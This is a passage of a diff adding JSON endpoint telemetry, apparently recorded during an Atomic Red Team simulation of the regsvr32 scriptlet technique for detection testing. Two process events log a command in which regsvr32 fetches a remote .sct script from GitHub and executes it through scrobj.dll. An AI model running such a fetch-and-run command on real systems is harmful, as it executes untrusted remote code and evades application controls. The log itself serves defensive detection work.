"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236670000, 
+ "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "dwmapi.dll", + "image_path": "C:\\Windows\\System32\\dwmapi.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573236200016, + "unique_pid": "{00000000-0000-0000-0000-000000000000}" + }, + { + "event_type": "file", + "file_name": "REGSVR32.EXE-55A4EE79.pf", + "file_path": "C:\\Windows\\Prefetch\\REGSVR32.EXE-55A4EE79.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 2652, + "ppid": 7036, + "process_name": 
"cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573237050000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2652, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573236980000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2652, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573236980000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2652, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573236980000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2652, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573236980000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2652, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573236980000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}" + }, + { + "command_line": "regsvr32.exe /s /u 
/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2012, + "ppid": 2652, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "subtype": "create", + "timestamp": 131883573237130000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}", + "unique_ppid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "apphelp.dll", + "image_path": "C:\\Windows\\System32\\apphelp.dll", + "pid": 2652, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}" + }, + { + "event_type": "image_load", + "image_name": "regsvr32.exe", + "image_path": "C:\\Windows\\System32\\regsvr32.exe", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + 
"image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "apphelp.dll", + "image_path": "C:\\Windows\\System32\\apphelp.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "AcLayers.dll", + "image_path": "C:\\Windows\\System32\\AcLayers.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 2012, + 
"process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\System32\\shlwapi.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": 
"C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "sfc.dll", + "image_path": "C:\\Windows\\System32\\sfc.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "winspool.drv", + "image_path": "C:\\Windows\\System32\\winspool.drv", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "propsys.dll", + "image_path": "C:\\Windows\\System32\\propsys.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\System32\\oleaut32.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", 
+ "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "SHCore.dll", + "image_path": "C:\\Windows\\System32\\SHCore.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237300000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237300000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "bcrypt.dll", + "image_path": "C:\\Windows\\System32\\bcrypt.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237300000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "sfc.dll", + "image_path": "C:\\Windows\\System32\\sfc.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237300000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "sfc_os.dll", + "image_path": "C:\\Windows\\System32\\sfc_os.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237300000, + "unique_pid": 
"{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\System32\\imm32.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237300000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\System32\\ole32.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237300000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "uxtheme.dll", + "image_path": "C:\\Windows\\System32\\uxtheme.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237300000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "scrobj.dll", + "image_path": "C:\\Windows\\System32\\scrobj.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237450016, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237450016, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "urlmon.dll", + "image_path": "C:\\Windows\\System32\\urlmon.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237450016, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": 
"image_load", + "image_name": "windows.storage.dll", + "image_path": "C:\\Windows\\System32\\windows.storage.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237450016, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "profapi.dll", + "image_path": "C:\\Windows\\System32\\profapi.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237450016, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "powrprof.dll", + "image_path": "C:\\Windows\\System32\\powrprof.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237450016, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "iertutil.dll", + "image_path": "C:\\Windows\\System32\\iertutil.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237450016, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "fltLib.dll", + "image_path": "C:\\Windows\\System32\\fltLib.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237450016, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "cryptbase.dll", + "image_path": "C:\\Windows\\System32\\cryptbase.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237450016, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "dwmapi.dll", + 
"image_path": "C:\\Windows\\System32\\dwmapi.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237450016, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573237930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573237930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "sspicli.dll", + "image_path": "C:\\Windows\\System32\\sspicli.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237930000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237930000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "OnDemandConnRouteHelper.dll", + "image_path": 
"C:\\Windows\\System32\\OnDemandConnRouteHelper.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237930000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "winhttp.dll", + "image_path": "C:\\Windows\\System32\\winhttp.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237930000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap", + "registry_value": "ZoneMap", + "timestamp": 131883573237930000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass", + "registry_value": "ProxyBypass", + "timestamp": 131883573237930000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap", + 
"registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName", + "registry_value": "IntranetName", + "timestamp": 131883573237930000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet", + "registry_value": "UNCAsIntranet", + "timestamp": 131883573237930000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect", + "registry_value": "AutoDetect", + "timestamp": 131883573237930000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass", + "registry_value": "ProxyBypass", + "timestamp": 131883573237930000, + "unique_pid": 
"{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName", + "registry_value": "IntranetName", + "timestamp": 131883573237930000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet", + "registry_value": "UNCAsIntranet", + "timestamp": 131883573237930000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect", + "registry_value": "AutoDetect", + "timestamp": 131883573237930000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + 
